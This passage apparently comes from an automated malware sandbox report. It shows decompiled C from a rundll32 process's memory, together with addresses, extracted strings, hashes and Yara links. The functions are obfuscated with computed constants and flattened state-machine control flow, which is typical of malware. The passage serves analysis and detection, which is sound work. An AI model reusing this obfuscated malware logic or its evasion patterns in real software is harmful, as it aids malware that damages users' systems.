			E001F5856(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _t207;
				signed int _t209;
				int _t213;
				void* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t233;
				void* _t262;
				void* _t266;
				signed int _t268;

				_v20 = 0xe5e9;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x000072fc;
				_v60 = 0xeee;
				_t266 = __ecx;
				_t219 = 0xb;
				_v60 = _v60 / _t219;
				_t220 = 0x2d;
				_v60 = _v60 / _t220;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x00001c10;
				_v36 = 0x52f6;
				_v36 = _v36 ^ 0x4f1b66f5;
				_t221 = 0x42;
				_v36 = _v36 * 0x69;
				_v36 = _v36 ^ 0x72285533;
				_v12 = 0x9a21;
				_v12 = _v12 | 0x390e9e30;
				_v12 = _v12 ^ 0x390e9e21;
				_v64 = 0x3c55;
				_v64 = _v64 / _t221;
				_v64 = _v64 + 0xffff9cac;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xfffe1a99;
				_v44 = 0xe171;
				_v44 = _v44 | 0xc7bc5698;
				_t222 = 0x66;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x01f52ba1;
				_v40 = 0x30e3;
				_v40 = _v40 ^ 0xbd01c268;
				_v40 = _v40 ^ 0x5fce1aa6;
				_v40 = _v40 ^ 0xe2cffd7a;
				_v24 = 0x83cc;
				_t223 = 0x5f;
				_v24 = _v24 / _t223;
				_v24 = _v24 ^ 0x00004c9a;
				_v56 = 0x8dff;
				_t224 = 0x7e;
				_v56 = _v56 / _t224;
				_v56 = _v56 | 0x1e081a33;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0007b8c6;
				_v16 = 0x76f3;
				_t225 = 0x52;
				_v16 = _v16 / _t225;
				_v16 = _v16 ^ 0x00007e48;
				_v48 = 0xd814;
				_t226 = 0x1a;
				_v48 = _v48 / _t226;
				_v48 = _v48 >> 5;
				_v48 = _v48 | 0x7e8c2f48;
				_v48 = _v48 ^ 0x7e8c1b4f;
				_v28 = 0x13ee;
				_t227 = 0x75;
				_v28 = _v28 / _t227;
				_v28 = _v28 + 0xffff1a4e;
				_v28 = _v28 ^ 0xffff6e25;
				_v8 = 0x2381;
				_v8 = _v8 + 0xffff7415;
				_v8 = _v8 ^ 0xffffaad1;
				_v32 = 0x9c03;
				_t228 = 0x2a;
				_v32 = _v32 / _t228;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x00002dee;
				_v52 = 0xdc3f;
				_v52 = _v52 >> 0xb;
				_v52 = _v52 ^ 0xda865163;
				_v52 = _v52 * 0x7a;
				_v52 = _v52 ^ 0x2402d330;
				_v4 = E00207B6B();
				_t216 = _v20 + E00207B6B() % _v60;
				_t207 = E00207B6B();
				_t209 = _v52;
				_t268 = _v36 + _t207 % _v12;
				if(_t209 < _t216) {
					_t217 = _t216 - _t209;
					_t262 = _t266;
					_t233 = _t217 >> 1;
					_t213 = memset(_t262, 0x2d002d, _t233 << 2);
					asm("adc ecx, ecx");
					_t266 = _t266 + _t217 * 2;
					memset(_t262 + _t233, _t213, 0);
				}
				E001F60DA( &_v4, _v48, 3, _t268, _v28, _v8, _v32, _t266);
				 *((short*)(_t266 + _t268 * 2)) = 0;
				return 0;
			}

0x001f5859
0x001f5863
0x001f5867
0x001f586f
0x001f5880
0x001f5882
0x001f5887
0x001f5891
0x001f5896
0x001f589c
0x001f58a1
0x001f58a9
0x001f58b1
0x001f58be
0x001f58c1
0x001f58c5
0x001f58cd
0x001f58d5
0x001f58dd
0x001f58e5
0x001f58f5
0x001f58f9
0x001f5901
0x001f5906
0x001f590e
0x001f5916
0x001f5922
0x001f5927
0x001f592d
0x001f5935
0x001f593d
0x001f5945
0x001f594d
0x001f5955
0x001f5961
0x001f5966
0x001f596c
0x001f5974
0x001f5980
0x001f5985
0x001f598b
0x001f5993
0x001f5998
0x001f59a0
0x001f59ac
0x001f59af
0x001f59b3
0x001f59bb
0x001f59cb
0x001f59d0
0x001f59d6
0x001f59db
0x001f59e3
0x001f59eb
0x001f59f7
0x001f59fc
0x001f5a02
0x001f5a0a
0x001f5a12
0x001f5a1a
0x001f5a22
0x001f5a2a
0x001f5a36
0x001f5a39
0x001f5a3d
0x001f5a42
0x001f5a4a
0x001f5a52
0x001f5a57
0x001f5a64
0x001f5a68
0x001f5a7d
0x001f5a9e
0x001f5aa4
0x001f5ab5
0x001f5ab9
0x001f5abd
0x001f5abf
0x001f5ac9
0x001f5acb
0x001f5acd
0x001f5acf
0x001f5ad1
0x001f5ad4
0x001f5ad7
0x001f5af0
0x001f5afa
0x001f5b04

Strings

0, xrefs: 001F5935
H~, xrefs: 001F59B3
-, xrefs: 001F5A42
U<, xrefs: 001F58E5
3U(r, xrefs: 001F58C5
q, xrefs: 001F590E

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 3U(r$H~$U<$q$-$0
API String ID: 0-112106996
Opcode ID: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction ID: 5ceaef3598a1fa6e83efbd97236a745f8b385d5372d354e1624adb825ddb9ea7
Opcode Fuzzy Hash: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction Fuzzy Hash: E87144716083419FE348CF25D88A50BBBF2FBD8708F10891DF1999B2A0D7B5DA198F46

Uniqueness

Uniqueness Score: -1.00%

Function 00294DCA, Relevance: 7.7, Strings: 6, Instructions: 168COMMON

Download Yara Rule

Strings

-, xrefs: 00294FB6
U<, xrefs: 00294E59
0, xrefs: 00294EA9
H~, xrefs: 00294F27
3U(r, xrefs: 00294E39
q, xrefs: 00294E82

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 3U(r$H~$U<$q$-$0
API String ID: 0-112106996
Opcode ID: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction ID: 5e3b51856462532af9401d4728da4bdf9ba484d75aaf4f9868a6813e3f071aee
Opcode Fuzzy Hash: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction Fuzzy Hash: 8571457160C3419FE348CF25D88A50BBBE2FBC9708F10891DF1999B2A0D7B5DA598F46

Uniqueness

Uniqueness Score: -1.00%

Function 001F4BDE, Relevance: 7.7, Strings: 6, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E001F4BDE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t127;
				intOrPtr _t142;
				void* _t145;
				void* _t148;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t169;
				signed int* _t172;

				_push(_a20);
				_push(1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(1);
				E001F56B2(_t127);
				_v24 = 0x41a5;
				_t172 =  &(( &_v60)[7]);
				_v24 = _v24 + 0x21bb;
				_v24 = _v24 ^ 0x00007358;
				_t169 = 0;
				_v28 = 0x71a;
				_t148 = 0xfead4ff;
				_t164 = 0x12;
				_v28 = _v28 * 0x28;
				_v28 = _v28 ^ 0x00016495;
				_v32 = 0xbf26;
				_v32 = _v32 + 0xffff8b18;
				_v32 = _v32 ^ 0x000031b7;
				_v36 = 0x25da;
				_v36 = _v36 ^ 0x27b288f9;
				_v36 = _v36 ^ 0x27b2aeec;
				_v56 = 0xc86;
				_v56 = _v56 * 0x14;
				_v56 = _v56 / _t164;
				_v56 = _v56 | 0x1dd3be64;
				_v56 = _v56 ^ 0x1dd38503;
				_v52 = 0xa82;
				_t165 = 0x49;
				_v52 = _v52 / _t165;
				_v52 = _v52 + 0x548f;
				_v52 = _v52 ^ 0x000056ef;
				_v60 = 0x147a;
				_v60 = _v60 + 0xffff5465;
				_v60 = _v60 + 0x4912;
				_v60 = _v60 + 0x75b6;
				_v60 = _v60 ^ 0x00000d5b;
				_v12 = 0x2808;
				_t166 = 0x3c;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x00007e81;
				_v16 = 0x677c;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x00000f03;
				_v20 = 0x40ea;
				_t73 =  &_v20; // 0x40ea
				_t167 = 7;
				_v20 =  *_t73 / _t167;
				_v20 = _v20 ^ 0x0000696b;
				_v8 = 0x2aca;
				_v8 = _v8 ^ 0x5bcab796;
				_v8 = _v8 ^ 0x5bca9ee4;
				_v40 = 0x8019;
				_v40 = _v40 >> 1;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x00802c80;
				_v44 = 0xa509;
				_v44 = _v44 | 0xfb24deb0;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x93fe8f44;
				_v48 = 0x64c2;
				_v48 = _v48 + 0xffffc005;
				_v48 = _v48 | 0x8cdd04ab;
				_v48 = _v48 ^ 0x8cdd37a9;
				_t168 = _v4;
				while(_t148 != 0x109ed35) {
					if(_t148 == 0xfead4ff) {
						_t148 = 0x2ad569f8;
						continue;
					} else {
						if(_t148 == 0x1649e19d) {
							_t114 =  &_v20; // 0x40ea
							E00207A72(_a20, _v56, 1, 1, _v52, _v60, _v12, _t148, _a8, _v16,  *_t114, _v4);
							_t172 =  &(_t172[0xa]);
							_t148 = 0x109ed35;
							_t169 =  !=  ? 1 : _t169;
							continue;
						} else {
							if(_t148 == 0x2ad569f8) {
								_t142 = E00204DBD();
								_t168 = _t142;
								if(_t142 != 0xffffffff) {
									_t148 = 0x2e3949fa;
									continue;
								}
							} else {
								if(_t148 != 0x2e3949fa) {
									L13:
									if(_t148 != 0x14320148) {
										continue;
									}
								} else {
									_t111 =  &_v28; // 0x40ea
									_t145 = E0020D472(_t168,  *_t111, _v32, _v36,  &_v4);
									_t172 =  &(_t172[3]);
									if(_t145 != 0) {
										_t148 = 0x1649e19d;
										continue;
									}
								}
							}
						}
					}
					return _t169;
				}
				E001F78F0(_v4, _v8, _v40, _v44, _v48);
				_t172 =  &(_t172[3]);
				_t148 = 0x14320148;
				goto L13;
			}

0x001f4be5
0x001f4bec
0x001f4bed
0x001f4bf1
0x001f4bf5
0x001f4bf9
0x001f4bfa
0x001f4bfb
0x001f4c00
0x001f4c08
0x001f4c0b
0x001f4c15
0x001f4c1d
0x001f4c1f
0x001f4c27
0x001f4c33
0x001f4c36
0x001f4c3a
0x001f4c42
0x001f4c4a
0x001f4c52
0x001f4c5a
0x001f4c62
0x001f4c6a
0x001f4c72
0x001f4c7f
0x001f4c8b
0x001f4c8f
0x001f4c97
0x001f4c9f
0x001f4cab
0x001f4cb0
0x001f4cb6
0x001f4cbe
0x001f4cc6
0x001f4cce
0x001f4cd6
0x001f4cde
0x001f4ce6
0x001f4cee
0x001f4cfa
0x001f4cff
0x001f4d05
0x001f4d0d
0x001f4d15
0x001f4d1a
0x001f4d22
0x001f4d2a
0x001f4d2e
0x001f4d31
0x001f4d35
0x001f4d3d
0x001f4d45
0x001f4d4d
0x001f4d55
0x001f4d5d
0x001f4d61
0x001f4d66
0x001f4d6e
0x001f4d7b
0x001f4d83
0x001f4d88
0x001f4d90
0x001f4d98
0x001f4da0
0x001f4da8
0x001f4db0
0x001f4db4
0x001f4dc6
0x001f4e60
0x00000000
0x001f4dcc
0x001f4dce
0x001f4e26
0x001f4e49
0x001f4e4e
0x001f4e51
0x001f4e58
0x00000000
0x001f4dd0
0x001f4dd6
0x001f4e0f
0x001f4e14
0x001f4e19
0x001f4e1b
0x00000000
0x001f4e1b
0x001f4dd8
0x001f4dde
0x001f4e8b
0x001f4e91
0x00000000
0x00000000
0x001f4de4
0x001f4df3
0x001f4df7
0x001f4dfc
0x001f4e01
0x001f4e07
0x00000000
0x001f4e07
0x001f4e01
0x001f4dde
0x001f4dd6
0x001f4dce
0x001f4ea0
0x001f4ea0
0x001f4e7e
0x001f4e83
0x001f4e86
0x00000000

Strings

|g, xrefs: 001F4D0D
@<, xrefs: 001F4D2A
V, xrefs: 001F4CBE
ki, xrefs: 001F4D35
[, xrefs: 001F4CE6
Xs, xrefs: 001F4C15

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Xs$[$ki$|g$@<$V
API String ID: 0-1782315456
Opcode ID: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
Instruction ID: 0a7125995587e14ed5141c7f6d5803b54fc383453fd9a8dd9551613133e13e5d
Opcode Fuzzy Hash: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
Instruction Fuzzy Hash: 9B614571509340AFD754CF65C88982BBBF2FBD4718F444A1CF696462A1C379DA198F83

Uniqueness

Uniqueness Score: -1.00%

Function 00294152, Relevance: 7.7, Strings: 6, Instructions: 158COMMON

Download Yara Rule

Strings

|g, xrefs: 00294281
[, xrefs: 0029425A
V, xrefs: 00294232
Xs, xrefs: 00294189
ki, xrefs: 002942A9
@<, xrefs: 0029429E

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Xs$[$ki$|g$@<$V
API String ID: 0-1782315456
Opcode ID: f9ce27b952bcca3b85e7847e61a30ab707e56c2e03c8e1c9950973b82f59de4e
Instruction ID: 78b3b7b0cdad18b7bfa2f42d6d44850563ef0408125c162a67342dd9286f1c63
Opcode Fuzzy Hash: f9ce27b952bcca3b85e7847e61a30ab707e56c2e03c8e1c9950973b82f59de4e
Instruction Fuzzy Hash: 86616671509341AFD794DF25C88981FBBE2FBD4718F504A0CF686862A0C3B5CA2A8F47

Uniqueness

Uniqueness Score: -1.00%

Function 0020231B, Relevance: 6.6, Strings: 5, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0020231B(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t296;
				void* _t321;
				intOrPtr _t325;
				void* _t327;
				short _t328;
				void* _t334;
				signed int _t338;
				signed int _t339;
				void* _t341;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				signed int _t391;
				signed int _t394;
				signed int* _t396;
				void* _t398;

				_push(_a12);
				_t377 = _a4;
				_push(_a8);
				_push(_t377);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t296);
				_v8 = _v8 & 0x00000000;
				_t396 =  &(( &_v124)[5]);
				_v96 = 0x1023;
				_v96 = _v96 ^ 0xe47dc4fc;
				_t341 = 0x27600fdb;
				_v96 = _v96 ^ 0x32abab6c;
				_v96 = _v96 | 0x6d93312b;
				_v96 = _v96 ^ 0xffd78252;
				_v16 = 0xdaf7;
				_t381 = 0x16;
				_v16 = _v16 / _t381;
				_v16 = _v16 ^ 0x000001c4;
				_v20 = 0x6395;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x18e533fd;
				_v88 = 0xa972;
				_v88 = _v88 | 0xad5f380f;
				_t382 = 0x43;
				_v88 = _v88 / _t382;
				_v88 = _v88 * 0x65;
				_v88 = _v88 ^ 0x055ac7b0;
				_v44 = 0xf64e;
				_v44 = _v44 ^ 0xc329889b;
				_v44 = _v44 ^ 0xc3290878;
				_v120 = 0x240c;
				_v120 = _v120 ^ 0x7b0f575c;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x9190;
				_v120 = _v120 ^ 0xee6af427;
				_v68 = 0x2382;
				_v68 = _v68 ^ 0xaf4a09f1;
				_v68 = _v68 + 0xffff93b5;
				_v68 = _v68 ^ 0xaf49ee02;
				_v124 = 0xa6c0;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 << 0xf;
				_v124 = _v124 * 0x50;
				_v124 = _v124 ^ 0x01900d65;
				_v48 = 0x59b;
				_v48 = _v48 | 0x1d932e17;
				_v48 = _v48 ^ 0x1d93434e;
				_v32 = 0x7dc;
				_v32 = _v32 | 0x7a0a60f4;
				_v32 = _v32 ^ 0x7a0a2147;
				_v36 = 0xa0ae;
				_v36 = _v36 | 0x35bc5344;
				_v36 = _v36 ^ 0x35bce77d;
				_v40 = 0xf45a;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00007c19;
				_v24 = 0xd9df;
				_v24 = _v24 + 0x4204;
				_v24 = _v24 ^ 0x00011e54;
				_v28 = 0xf9ca;
				_v28 = _v28 ^ 0x4b2056fe;
				_v28 = _v28 ^ 0x4b20b363;
				_v112 = 0xa35c;
				_t383 = 7;
				_v112 = _v112 / _t383;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x00007415;
				_v100 = 0x2d35;
				_v100 = _v100 | 0x4fbfcbdf;
				_v100 = _v100 + 0xffffcb51;
				_v100 = _v100 ^ 0x4fbfa459;
				_v104 = 0x199f;
				_v104 = _v104 | 0xa6a9e361;
				_v104 = _v104 ^ 0x0fa1695b;
				_t384 = 0x70;
				_v104 = _v104 * 0x34;
				_v104 = _v104 ^ 0x55bdfdea;
				_v108 = 0x6dac;
				_v108 = _v108 + 0x7618;
				_v108 = _v108 | 0xd437a5be;
				_v108 = _v108 >> 5;
				_v108 = _v108 ^ 0x06a1e076;
				_v52 = 0xb587;
				_v52 = _v52 / _t384;
				_v52 = _v52 | 0x698df789;
				_v52 = _v52 ^ 0x698dbdb0;
				_v56 = 0xcc44;
				_t385 = 0x54;
				_v56 = _v56 / _t385;
				_v56 = _v56 + 0xffff840a;
				_v56 = _v56 ^ 0xffffb5b3;
				_v92 = 0x53df;
				_t386 = 0x38;
				_v92 = _v92 * 0x2b;
				_v92 = _v92 ^ 0x72368f4f;
				_v92 = _v92 * 0x5f;
				_v92 = _v92 ^ 0x6300adc9;
				_v60 = 0xeb4;
				_v60 = _v60 ^ 0x82e65f12;
				_v60 = _v60 * 0x12;
				_v60 = _v60 ^ 0x3431ffe0;
				_v76 = 0x9ea1;
				_v76 = _v76 / _t386;
				_v76 = _v76 << 9;
				_v76 = _v76 | 0x56c1a970;
				_v76 = _v76 ^ 0x56c5f8a5;
				_v80 = 0xe36f;
				_t387 = 0x71;
				_v80 = _v80 / _t387;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 ^ 0x00002ab6;
				_v12 = 0xbe7b;
				_v12 = _v12 ^ 0xb73b4484;
				_v12 = _v12 ^ 0xb73bd21d;
				_v84 = 0x2f05;
				_v84 = _v84 ^ 0x486d0961;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0xccd4c0a7;
				_v84 = _v84 ^ 0x06ef1f50;
				_v72 = 0xb051;
				_v72 = _v72 | 0x44f81078;
				_t394 = _v4;
				_t338 = _v4;
				_v72 = _v72 * 0x1b;
				_v72 = _v72 ^ 0x463a9cc3;
				_v116 = 0x904e;
				_v116 = _v116 >> 6;
				_v116 = _v116 | 0x00eb6e86;
				_v116 = _v116 >> 8;
				_v116 = _v116 ^ 0x0000eb6e;
				_v64 = 0x30db;
				_v64 = _v64 + 0xffffb1c5;
				_v64 = _v64 ^ 0x9ee5eb39;
				_v64 = _v64 ^ 0x611a0999;
				while(1) {
					_t321 = 0x5942909;
					while(1) {
						L2:
						_t398 = _t341 - 0x19684f4e;
						if(_t398 > 0) {
							break;
						}
						if(_t398 == 0) {
							E001F91CD(_v52, _v56, _v92, _t394, _v60);
							_t396 =  &(_t396[3]);
							_t341 = 0x203b69b2;
							while(1) {
								_t321 = 0x5942909;
								goto L2;
							}
						} else {
							if(_t341 == 0x45bbbee) {
								 *(_t377 + 4) = _v64;
								_t325 = E001FC6EF(_t377 + 4, _v96, _v100, _v104, _t338 - 1, _t394, _v108);
								_t396 =  &(_t396[5]);
								 *_t377 = _t325;
								_t341 = 0x19684f4e;
								while(1) {
									_t321 = 0x5942909;
									goto L2;
								}
							} else {
								if(_t341 == _t321) {
									_t338 = _v116;
									_t379 = _v8;
									if(_t379 != 0) {
										do {
											E00205891(_t379 + 0x2c, _t338 * 2 + _t394, _v32, _v36, _v40);
											_t327 = E0020BBAB(_v24, _v28, _t379 + 0x2c, _v112);
											_t396 =  &(_t396[5]);
											_t339 = _t338 + _t327;
											_t328 = 0x2c;
											 *((short*)(_t394 + _t339 * 2)) = _t328;
											_t338 = _t339 + 1;
											_t379 =  *((intOrPtr*)(_t379 + 0x1c));
										} while (_t379 != 0);
										_t321 = 0x5942909;
									}
									_t391 = _v4;
									_t341 = 0x45bbbee;
									goto L13;
								} else {
									if(_t341 == 0xb31c45f) {
										_t391 = _v72;
										_t380 = _v8;
										_v4 = _t391;
										if(_t380 != 0) {
											do {
												_t334 = E0020BBAB(_v44, _v120, _t380 + 0x2c, _v68);
												_t380 =  *((intOrPtr*)(_t380 + 0x1c));
												_t391 = _t391 + 1 + _t334;
											} while (_t380 != 0);
											_v4 = _t391;
											_t321 = 0x5942909;
										}
										_t341 = 0xd80ae87;
										L13:
										_t377 = _a4;
										continue;
									} else {
										if(_t341 == 0xd80ae87) {
											_push(_t341);
											_t394 = E002057E8(_t391 + _t391);
											_t321 = 0x5942909;
											_t341 =  !=  ? 0x5942909 : 0x203b69b2;
											continue;
										}
									}
								}
							}
						}
						L29:
						if(_t341 != 0x178c149f) {
							continue;
						}
						return 0 |  *_t377 != 0x00000000;
					}
					if(_t341 == 0x203b69b2) {
						_t378 = _v8;
						if(_t378 != 0) {
							do {
								_t390 =  *(_t378 + 0x1c);
								E001F91CD(_v76, _v80, _v12, _t378, _v84);
								_t396 =  &(_t396[3]);
								_t378 = _t390;
							} while (_t390 != 0);
							_t321 = 0x5942909;
						}
						_t377 = _a4;
						_t341 = 0x178c149f;
					} else {
						if(_t341 == 0x27600fdb) {
							_t341 = 0x2d4988fb;
							goto L2;
						} else {
							if(_t341 == 0x2d4988fb) {
								E002042E2( &_v8, E001F5EB9, _v20, _v88);
								_t396 =  &(_t396[3]);
								_t341 = 0xb31c45f;
								continue;
							}
						}
					}
					goto L29;
				}
			}

0x00202322
0x00202329
0x00202330
0x00202337
0x00202338
0x00202339
0x0020233a
0x0020233f
0x00202347
0x0020234a
0x00202354
0x0020235c
0x00202361
0x00202369
0x00202371
0x00202379
0x00202387
0x0020238c
0x00202395
0x002023a0
0x002023a8
0x002023ad
0x002023b5
0x002023bd
0x002023c9
0x002023cc
0x002023d5
0x002023d9
0x002023e1
0x002023e9
0x002023f1
0x002023f9
0x00202401
0x00202409
0x0020240e
0x00202416
0x0020241e
0x00202426
0x0020242e
0x00202436
0x0020243e
0x00202446
0x0020244b
0x00202455
0x00202459
0x00202461
0x00202469
0x00202471
0x00202479
0x00202481
0x00202489
0x00202491
0x00202499
0x002024a1
0x002024a9
0x002024b1
0x002024b6
0x002024be
0x002024c6
0x002024ce
0x002024d6
0x002024de
0x002024e6
0x002024ee
0x00202506
0x0020250b
0x00202511
0x00202516
0x0020251e
0x00202526
0x0020252e
0x00202536
0x0020253e
0x00202546
0x0020254e
0x0020255b
0x0020255e
0x00202562
0x0020256a
0x00202572
0x0020257a
0x00202582
0x00202587
0x0020258f
0x0020259f
0x002025a3
0x002025ab
0x002025b3
0x002025bf
0x002025c4
0x002025ca
0x002025d2
0x002025da
0x002025e7
0x002025ea
0x002025ee
0x002025fb
0x002025ff
0x00202607
0x0020260f
0x0020261c
0x00202620
0x00202628
0x00202638
0x0020263c
0x00202641
0x00202649
0x00202651
0x0020265d
0x00202660
0x00202664
0x00202669
0x0020266e
0x00202676
0x00202681
0x0020268c
0x00202697
0x0020269f
0x002026ac
0x002026b0
0x002026b8
0x002026c0
0x002026c8
0x002026d5
0x002026dc
0x002026ea
0x002026ee
0x002026f6
0x002026fe
0x00202703
0x0020270b
0x00202710
0x00202718
0x00202720
0x00202728
0x00202730
0x00202738
0x00202738
0x0020273d
0x0020273d
0x0020273d
0x00202743
0x00000000
0x00000000
0x00202749
0x002028a1
0x002028a6
0x002028a9
0x00202738
0x00202738
0x00000000
0x00202738
0x0020274f
0x00202755
0x00202869
0x0020287c
0x00202881
0x00202884
0x00202886
0x00202738
0x00202738
0x00000000
0x00202738
0x0020275b
0x0020275d
0x002027f0
0x002027f4
0x002027fd
0x002027ff
0x00202819
0x00202831
0x00202836
0x00202839
0x0020283d
0x0020283e
0x00202843
0x00202844
0x00202847
0x0020284b
0x0020284b
0x00202850
0x00202857
0x00000000
0x00202763
0x00202769
0x0020279c
0x002027a0
0x002027a7
0x002027b0
0x002027b2
0x002027c2
0x002027c7
0x002027cc
0x002027cf
0x002027d3
0x002027da
0x002027da
0x002027df
0x002027e4
0x002027e4
0x00000000
0x0020276b
0x00202771
0x0020277f
0x00202788
0x0020278a
0x00202797
0x00000000
0x00202797
0x00202771
0x00202769
0x0020275d
0x00202755
0x00202943
0x00202950
0x00000000
0x00000000
0x00202964
0x00202964
0x002028b9
0x00202902
0x0020290b
0x0020290d
0x00202911
0x00202924
0x00202929
0x0020292c
0x0020292e
0x00202932
0x00202932
0x00202937
0x0020293e
0x002028bb
0x002028c1
0x002028f8
0x00000000
0x002028c3
0x002028c9
0x002028e6
0x002028eb
0x002028ee
0x00000000
0x002028ee
0x002028c9
0x002028c1
0x00000000
0x002028b9

Strings

n, xrefs: 00202710
amH, xrefs: 0020269F
G!z, xrefs: 00202489
o, xrefs: 00202651
5-, xrefs: 0020251E

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5-$G!z$amH$n$o
API String ID: 0-2418732634
Opcode ID: f8a8d4703eb7337004bf783c2207d3f088e48458666fb9c1e1a98346d4e13b8e
Instruction ID: 8aadb52408dda10e0f9205f33e53793ba44ea8b353d7f8af2539e196882b2227
Opcode Fuzzy Hash: f8a8d4703eb7337004bf783c2207d3f088e48458666fb9c1e1a98346d4e13b8e
Instruction Fuzzy Hash: 2DF14275008381CFD368CF25C58965BFBE1FBC4758F60890DF29A9A2A1C7B59949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 002A188F, Relevance: 6.6, Strings: 5, Instructions: 327COMMON

Download Yara Rule

Strings

n, xrefs: 002A1C84
G!z, xrefs: 002A19FD
amH, xrefs: 002A1C13
o, xrefs: 002A1BC5
5-, xrefs: 002A1A92

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5-$G!z$amH$n$o
API String ID: 0-2418732634
Opcode ID: 9076bf08c41f1ebe08a67630f2ccddbbb6f89bd5bc4b32a4231534da199f6262
Instruction ID: 1326d5e0cd6a009aa85b291587b1bf910cc81383cb02d6ea056dbbf2da7ab8e8
Opcode Fuzzy Hash: 9076bf08c41f1ebe08a67630f2ccddbbb6f89bd5bc4b32a4231534da199f6262
Instruction Fuzzy Hash: BDF162714083818FD368CF25C58664BBBF1FBC5768F60890DF69A96260CBB59958CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0020C04C, Relevance: 6.4, Strings: 5, Instructions: 182
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

